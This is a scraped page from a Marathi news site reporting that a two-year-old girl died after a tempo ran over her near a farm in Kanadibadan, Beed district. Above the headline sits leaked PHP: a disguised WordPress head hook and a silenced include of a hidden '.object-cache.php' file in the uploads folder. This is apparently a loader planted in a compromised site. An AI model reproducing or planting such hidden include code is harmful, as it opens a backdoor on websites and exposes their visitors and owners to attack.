add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अंबाजोगई येथे टेम्पोखाली चिरडून दोन वर्षीय बालिकेचा अंत – SOCH INDIA
Menu

अपराध समाचार
अंबाजोगई येथे टेम्पोखाली चिरडून दोन वर्षीय बालिकेचा अंत

nobanner

शेतात खेळत असताना अंगावरून टाटा एस टेम्पो गेल्याने दोन वर्षीय बालिकेचा दुर्दैवी मृत्यू झाल्याची घटना कानडीबदन (ता. अंबाजोगाई, जि. बीड) येथे आज (गुरूवार) सकाळी १०.१५च्या सुमारास घडली.
अंबाजोगाई लगतच्या चनई येथील केशव आणि रत्नमाला गोचडे हे जोडपे शेती करून गुजराण करतात. आज सकाळी रत्नमाला गोचडे या त्यांची दोन वर्षाची मुलगी अनुष्काला घेऊन कानडीबदन येथे शेती कामासाठी गेल्या होत्या. त्या कामात गुंग असताना अनुष्का खेळत खेळत रोडवर आली आणि भरधाव वेगाने जाणाऱ्या टाटा एस टेम्पोखाली चिरडून तिचा जागीच मृत्यू झाला. याप्रकरणी पोलिसांत गुन्हा नोंद करून घेण्याचे काम सुरू होते. या घटनेने परिसरात हळहळ व्यक्त केली जात आहे.